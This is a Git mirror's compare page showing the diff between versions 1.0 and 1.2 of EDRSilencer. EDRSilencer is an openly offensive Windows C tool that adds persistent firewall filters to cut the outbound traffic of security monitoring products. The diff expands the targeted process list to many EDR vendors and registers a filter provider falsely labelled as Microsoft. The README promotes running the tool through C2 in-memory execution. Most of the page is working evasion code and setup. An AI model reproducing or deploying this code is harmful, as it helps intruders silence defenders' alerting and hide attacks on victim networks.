Mirrors/netero1010-edrsilencer
1
0
Fork 0
mirror of https://github.com/netero1010/EDRSilencer.git synced 2026-06-09 09:27:15 +00:00
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: Mirrors/netero1010-edrsilencer:1.0
Branches Tags
Mirrors/netero1010-edrsilencer:main
Mirrors/netero1010-edrsilencer:1.4 Mirrors/netero1010-edrsilencer:1.3 Mirrors/netero1010-edrsilencer:1.2 Mirrors/netero1010-edrsilencer:1.1 Mirrors/netero1010-edrsilencer:1.0
...
compare: Mirrors/netero1010-edrsilencer:1.2
Branches Tags
Mirrors/netero1010-edrsilencer:main
Mirrors/netero1010-edrsilencer:1.4 Mirrors/netero1010-edrsilencer:1.3 Mirrors/netero1010-edrsilencer:1.2 Mirrors/netero1010-edrsilencer:1.1 Mirrors/netero1010-edrsilencer:1.0

9 Commits
1.0 ... 1.2

Author SHA1 Message Date
netero1010 fb8f4b43a9 Version 1.2 2024-01-05 01:34:33 +08:00
netero1010 2c3a1c5e09 Update to include Cisco Secure Endpoint (credit @logdumpster). Also, removed CrowdStrike from the supporting list as blocking its service process is insufficient. Require further testing 2024-01-02 18:03:47 +08:00
netero1010 7988dae6bf Update to include Cisco Secure Endpoint (credit @logdumpster). Also, removed CrowdStrike from the supporting list as blocking its service process is insufficient. Require further testing 2024-01-02 18:02:49 +08:00
netero1010 6287d391ed Remove EDRSilencer.exe 2023-12-30 19:39:25 +08:00
netero1010 59e76a8aaa Update README.md 2023-12-30 19:38:31 +08:00
netero1010 e238862577 Update README.md 2023-12-30 19:36:57 +08:00
netero1010 d544a9fbb1 Added more EDR solutions (e.g., CrowdStrike, Carbon Black) to the list 2023-12-30 19:07:02 +08:00
Chris Au 2f16f16813 Merge pull request #2 from logdumpster/main 
Added Qualys EDR process
 2023-12-30 19:00:51 +08:00
logdumpster 7bffc66426 Added Qualys EDR process 
Added Qualys EDR process
 2023-12-29 01:05:03 -06:00
4 changed files with 256 additions and 55 deletions
Expand all files Collapse all files
EDRSilencer.c
+222 -40
View File
@@ -4,18 +4,83 @@ char* edrProcess[] = {
// Microsoft Defender for Endpoint and Microsoft Defender Antivirus
"MsMpEng.exe",
"MsSense.exe",
"SenseIR.exe",
"SenseNdr.exe",
"SenseCncProxy.exe",
"SenseSampleUploader.exe",
// Elastic EDR
"winlogbeat.exe",
"elastic-agent.exe",
"elastic-endpoint.exe",
"filebeat.exe",
// Trellix EDR
"xagt.exe"
"xagt.exe",
// Qualys EDR
"QualysAgent.exe",
// SentinelOne
"SentinelAgent.exe",
"SentinelAgentWorker.exe",
"SentinelServiceHost.exe",
"SentinelStaticEngine.exe",
"LogProcessorService.exe",
"SentinelStaticEngineScanner.exe",
"SentinelHelperService.exe",
"SentinelBrowserNativeHost.exe",
// Cylance
"CylanceSvc.exe",
// Cybereason
"AmSvc.exe",
"CrAmTray.exe",
"CrsSvc.exe",
"ExecutionPreventionSvc.exe",
"CybereasonAV.exe",
// Carbon Black EDR
"cb.exe",
// Carbon Black Cloud
"RepMgr.exe",
"RepUtils.exe",
"RepUx.exe",
"RepWAV.exe",
"RepWSC.exe",
// Tanium
"TaniumClient.exe",
"TaniumCX.exe",
"TaniumDetectEngine.exe",
// Palo Alto Networks Traps/Cortex XDR
"Traps.exe",
"cyserver.exe",
"CyveraService.exe",
"CyvrFsFlt.exe",
// FortiEDR
"fortiedr.exe",
// Cisco Secure Endpoint (Formerly Cisco AMP)
"sfc.exe",
// ESET Inspect
"EIConnector.exe",
// Harfanglab EDR
"hurukai.exe",
//TrendMicro Apex One
"CETASvc.exe",
"WSCommunicator.exe",
"EndpointBasecamp.exe",
"TmListen.exe",
"Ntrtscan.exe",
"TmWSCSvc.exe",
"PccNTMon.exe",
"TMBMSRV.exe",
"CNTAoSMgr.exe",
"TmCCSF.exe"
};
BOOL inWfpFlag[sizeof(edrProcess) / sizeof(edrProcess[0])] = { FALSE };
// The "unblockall" feature will delete all filters that are based on the custom filter name
WCHAR* filterName = L"Custom Outbound Filter";
WCHAR* providerName = L"Microsoft Corporation";
// provider description has to be unique because:
// - avoid problem in adding persistent WFP filter to a provider (error 0x80320016)
// - avoid removing legitimate WFP provider
WCHAR* providerDescription = L"Microsoft Windows WFP Built-in custom provider.";
// d78e1e87-8644-4ea5-9437-d809ecefc971
DEFINE_GUID(
@@ -47,7 +112,7 @@ DEFINE_GUID(
// Check if the running process is our list
BOOL isInEdrProcessList(const char* procName) {
for (int i = 0; i < sizeof(edrProcess) / sizeof(edrProcess[0]); i++) {
if (strstr(procName, edrProcess[i]) != NULL && !inWfpFlag[i]) {
if (strcmp(procName, edrProcess[i]) == 0 && !inWfpFlag[i]) {
inWfpFlag[i] = TRUE;
return TRUE;
}
@@ -55,15 +120,66 @@ BOOL isInEdrProcessList(const char* procName) {
return FALSE;
}
// Get provider GUID by description
BOOL GetProviderGUIDByDescription(PCWSTR providerDescription, GUID* outProviderGUID) {
DWORD result = 0;
HANDLE hEngine = NULL;
HANDLE enumHandle = NULL;
FWPM_PROVIDER0** providers = NULL;
UINT32 numProviders = 0;
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result);
return FALSE;
}
result = FwpmProviderCreateEnumHandle0(hEngine, NULL, &enumHandle);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmProviderCreateEnumHandle0 failed with error code: 0x%x\n", result);
FwpmEngineClose0(hEngine);
return FALSE;
}
result = FwpmProviderEnum0(hEngine, enumHandle, 100, &providers, &numProviders);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmProviderEnum0 failed with error code: 0x%x\n", result);
FwpmEngineClose0(hEngine);
return FALSE;
}
for (UINT32 i = 0; i < numProviders; i++) {
if (providers[i]->displayData.description != NULL) {
if (wcscmp(providers[i]->displayData.description, providerDescription) == 0) {
*outProviderGUID = providers[i]->providerKey;
return TRUE;
}
}
}
if (providers) {
FwpmFreeMemory0((void**)&providers);
}
FwpmProviderDestroyEnumHandle0(hEngine, enumHandle);
FwpmEngineClose0(hEngine);
return FALSE;
}
// Add WFP filters for all known EDR process(s)
void BlockEdrProcessTraffic() {
HANDLE hEngine;
FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
HANDLE hProcessSnap;
HANDLE hModuleSnap;
PROCESSENTRY32 pe32;
MODULEENTRY32 me32;
DWORD result = 0;
HANDLE hEngine = NULL;
HANDLE hProcessSnap = NULL;
HANDLE hModuleSnap = NULL;
PROCESSENTRY32 pe32 = {0};
BOOL isEdrDetected = FALSE;
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result);
return;
}
EnableSeDebugPrivilege();
@@ -87,20 +203,25 @@ void BlockEdrProcessTraffic() {
// Get full path of the running process
HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe32.th32ProcessID);
if (hProcess) {
WCHAR fullPath[MAX_PATH];
WCHAR fullPath[MAX_PATH] = {0};
DWORD size = MAX_PATH;
QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
FWPM_FILTER_CONDITION0 cond;
FWPM_FILTER_CONDITION0 cond = {0};
FWPM_FILTER0 filter = {0};
FWP_BYTE_BLOB* appId;
FWPM_PROVIDER0 provider = {0};
GUID providerGuid = {0};
FWP_BYTE_BLOB* appId = NULL;
UINT64 filterId = 0;
QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
DWORD result = FwpmGetAppIdFromFileName0(fullPath, &appId);
if (FwpmGetAppIdFromFileName0(fullPath, &appId) != ERROR_SUCCESS) {
printf(" [-] FwpmGetAppIdFromFileName0 failed to get app ID.\n");
if (result != ERROR_SUCCESS) {
printf(" [-] FwpmGetAppIdFromFileName0 failed to get app ID with error code: 0x%x\n", result);
CloseHandle(hProcess);
continue;
}
// Setting up WFP filter and condition
// Sett up WFP filter and condition
filter.displayData.name = filterName;
filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
@@ -112,8 +233,22 @@ void BlockEdrProcessTraffic() {
filter.filterCondition = &cond;
filter.numFilterConditions = 1;
UINT64 filterId;
DWORD result;
// Add WFP provider for the filter
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
} else {
provider.displayData.name = providerName;
provider.displayData.description = providerDescription;
provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
result = FwpmProviderAdd0(hEngine, &provider, NULL);
if (result != ERROR_SUCCESS) {
printf(" [-] FwpmProviderAdd0 failed with error code: 0x%x\n", result);
} else {
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
}
}
}
// Add filter to both IPv4 and IPv6 layers
result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
@@ -149,19 +284,27 @@ void BlockEdrProcessTraffic() {
// Add block WFP filter to user-defined process
void BlockProcessTraffic(char* fullPath) {
HANDLE hEngine;
FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
WCHAR wFullPath[MAX_PATH];
DWORD result = 0;
HANDLE hEngine = NULL;
WCHAR wFullPath[MAX_PATH] = {0};
DWORD size = MAX_PATH;
CharArrayToWCharArray(fullPath, wFullPath, sizeof(wFullPath) / sizeof(wFullPath[0]));
FWPM_FILTER_CONDITION0 cond;
FWPM_FILTER_CONDITION0 cond = {0};
FWPM_FILTER0 filter = {0};
FWP_BYTE_BLOB* appId;
FWPM_PROVIDER0 provider = {0};
GUID providerGuid = {0};
FWP_BYTE_BLOB* appId = NULL;
UINT64 filterId = 0;
if (FwpmGetAppIdFromFileName0(wFullPath, &appId) != ERROR_SUCCESS) {
printf("[-] FwpmGetAppIdFromFileName0 failed to get app ID. Please check if the process path is valid.\n");
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result);
return;
}
CharArrayToWCharArray(fullPath, wFullPath, sizeof(wFullPath) / sizeof(wFullPath[0]));
result = FwpmGetAppIdFromFileName0(wFullPath, &appId);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmGetAppIdFromFileName0 failed to get app ID with error code: 0x%x. Please check if the process path is valid.\n", result);
return;
}
@@ -177,8 +320,22 @@ void BlockProcessTraffic(char* fullPath) {
filter.filterCondition = &cond;
filter.numFilterConditions = 1;
UINT64 filterId;
DWORD result;
// Add WFP provider for the filter
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
} else {
provider.displayData.name = providerName;
provider.displayData.description = providerDescription;
provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
result = FwpmProviderAdd0(hEngine, &provider, NULL);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmProviderAdd0 failed with error code: 0x%x\n", result);
} else {
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
}
}
}
// Add filter to both IPv4 and IPv6 layers
result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
@@ -203,10 +360,11 @@ void BlockProcessTraffic(char* fullPath) {
// Remove all WFP filters previously created
void UnblockAllWfpFilters() {
HANDLE hEngine;
DWORD result;
HANDLE enumHandle;
FWPM_FILTER0** filters;
HANDLE hEngine = NULL;
DWORD result = 0;
HANDLE enumHandle = NULL;
FWPM_FILTER0** filters = NULL;
GUID providerGuid = {0};
UINT32 numFilters = 0;
BOOL foundFilter = FALSE;
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
@@ -249,6 +407,17 @@ void UnblockAllWfpFilters() {
}
}
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
if (result != ERROR_SUCCESS) {
if (result != FWP_E_IN_USE) {
printf("[-] FwpmProviderDeleteByKey0 failed with error code: 0x%x\n", result);
}
} else {
printf("Deleted custom WFP provider.\n");
}
}
if (!foundFilter) {
printf("[-] Unable to find any WFP filter created by this tool.\n");
}
@@ -258,8 +427,9 @@ void UnblockAllWfpFilters() {
// Remove WFP filter based on filter id
void UnblockWfpFilter(UINT64 filterId) {
HANDLE hEngine;
DWORD result;
HANDLE hEngine = NULL;
DWORD result = 0;
GUID providerGuid = {0};
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) {
@@ -278,19 +448,31 @@ void UnblockWfpFilter(UINT64 filterId) {
printf("[-] Failed to delete filter id: %llu with error code: 0x%x.\n", filterId, result);
}
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
if (result != ERROR_SUCCESS) {
if (result != FWP_E_IN_USE) {
printf("[-] FwpmProviderDeleteByKey0 failed with error code: 0x%x\n", result);
}
} else {
printf("Deleted custom WFP provider.\n");
}
}
FwpmEngineClose0(hEngine);
}
void PrintHelp() {
printf("Usage: EDROutBlock.exe <blockedr/block/unblockall/unblock>\n");
printf("Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>\n");
printf("Version: 1.2\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n");
printf(" EDROutBlock.exe blockedr\n\n");
printf(" EDRSilencer.exe blockedr\n\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n");
printf(" EDROutBlock.exe block \"C:\\Windows\\System32\\curl.exe\"\n\n");
printf(" EDRSilencer.exe block \"C:\\Windows\\System32\\curl.exe\"\n\n");
printf("- Remove all WFP filters applied by this tool:\n");
printf(" EDROutBlock.exe unblockall\n\n");
printf(" EDRSilencer.exe unblockall\n\n");
printf("- Remove a specific WFP filter based on filter id:\n");
printf(" EDROutBlock.exe unblock <filter id>");
printf(" EDRSilencer.exe unblock <filter id>");
}
int main(int argc, char *argv[]) {
README.md
+19 -1
View File
@@ -8,7 +8,25 @@ This tool offers the following features:
- Remove a specific WFP filter by filter id
- Support to run in C2 with in-memory PE execution module (e.g., `BruteRatel's memexec`)
**The current EDR process block list (edrProcess) includes only a limited number of EDR solutions (e.g., MDE, Elastic EDR). It would be appreciated if someone could assist in expanding the process list in `EDRSilencer.c` to encompass a broader range of other EDR solutions.**
The tool currently supports the following EDRs:
- Microsoft Defender for Endpoint and Microsoft Defender Antivirus
- Elastic EDR
- Trellix EDR
- Qualys EDR
- SentinelOne
- Cylance
- Cybereason
- Carbon Black EDR
- Carbon Black Cloud
- Tanium
- Palo Alto Networks Traps/Cortex XDR
- FortiEDR
- Cisco Secure Endpoint (Formerly Cisco AMP)
- ESET Inspect
- Harfanglab EDR
- TrendMicro Apex One
**As I do not have access to all these EDRs for testing, please do not hesitate to correct me if the listed processes (edrProcess in `EDRSilencer.c`) prove insufficient in blocking all alert, detection, or event forward traffic.**
## Testing Environment
Tested in Windows 10 and Windows Server 2016
utils.c
+13 -13
View File
@@ -1,20 +1,20 @@
#include "utils.h"
BOOL CheckProcessIntegrityLevel() {
HANDLE hToken;
HANDLE hToken = NULL;
DWORD dwLength = 0;
PTOKEN_MANDATORY_LABEL pTIL = NULL;
DWORD dwIntegrityLevel;
DWORD dwIntegrityLevel = 0;
BOOL isHighIntegrity = FALSE;
if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, TRUE, &hToken)) {
if (GetLastError() != ERROR_NO_TOKEN) {
printf("[-] OpenThreadToken failed with error code:0x%x\n", GetLastError());
printf("[-] OpenThreadToken failed with error code: 0x%x\n", GetLastError());
return FALSE;
}
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
printf("[-] OpenProcessToken failed with error code:0x%x\n", GetLastError());
printf("[-] OpenProcessToken failed with error code: 0x%x\n", GetLastError());
return FALSE;
}
}
@@ -22,20 +22,20 @@ BOOL CheckProcessIntegrityLevel() {
// Get the size of the integrity level information
if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLength) &&
GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
printf("[-] GetTokenInformation failed with error code:0x%x\n", GetLastError());
printf("[-] GetTokenInformation failed with error code: 0x%x\n", GetLastError());
CloseHandle(hToken);
return FALSE;
}
pTIL = (PTOKEN_MANDATORY_LABEL)LocalAlloc(LPTR, dwLength);
if (pTIL == NULL) {
printf("[-] LocalAlloc failed with error code:0x%x\n", GetLastError());
printf("[-] LocalAlloc failed with error code: 0x%x\n", GetLastError());
CloseHandle(hToken);
return FALSE;
}
if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLength, &dwLength)) {
printf("[-] GetTokenInformation failed with error code:0x%x\n", GetLastError());
printf("[-] GetTokenInformation failed with error code: 0x%x\n", GetLastError());
LocalFree(pTIL);
CloseHandle(hToken);
return FALSE;
@@ -57,22 +57,22 @@ BOOL CheckProcessIntegrityLevel() {
// Enable SeDebugPrivilege to obtain full path of running processes
BOOL EnableSeDebugPrivilege() {
HANDLE hToken = NULL;
TOKEN_PRIVILEGES tokenPrivileges = { 0 };
TOKEN_PRIVILEGES tokenPrivileges = {0};
if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, TRUE, &hToken)) {
if (GetLastError() != ERROR_NO_TOKEN) {
printf("[-] OpenThreadToken failed with error code:0x%x\n", GetLastError());
printf("[-] OpenThreadToken failed with error code: 0x%x\n", GetLastError());
return FALSE;
}
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
printf("[-] OpenProcessToken failed with error code:0x%x\n", GetLastError());
printf("[-] OpenProcessToken failed with error code: 0x%x\n", GetLastError());
return FALSE;
}
}
if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &tokenPrivileges.Privileges[0].Luid)){
printf("[-] LookupPrivilegeValueA failed with error code:0x%x\n", GetLastError());
printf("[-] LookupPrivilegeValueA failed with error code: 0x%x\n", GetLastError());
CloseHandle(hToken);
return FALSE;
}
@@ -81,7 +81,7 @@ BOOL EnableSeDebugPrivilege() {
tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
printf("[-] AdjustTokenPrivileges failed with error code:0x%x\n", GetLastError());
printf("[-] AdjustTokenPrivileges failed with error code: 0x%x\n", GetLastError());
CloseHandle(hToken);
return FALSE;
}
@@ -100,7 +100,7 @@ void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wC
int result = MultiByteToWideChar(CP_UTF8, 0, charArray, -1, wCharArray, wCharArraySize);
if (result == 0) {
printf("[-] MultiByteToWideChar failed with error code:0x%x\n", GetLastError());
printf("[-] MultiByteToWideChar failed with error code: 0x%x\n", GetLastError());
wCharArray[0] = L'\0';
}
}
utils.h
+2 -1
View File
@@ -5,6 +5,7 @@
#include <tlhelp32.h>
#define FWPM_FILTER_FLAG_PERSISTENT (0x00000001)
#define FWPM_PROVIDER_FLAG_PERSISTENT (0x00000001)
BOOL CheckProcessIntegrityLevel();
BOOL EnableSeDebugPrivilege();
void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wCharArraySize);
void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wCharArraySize);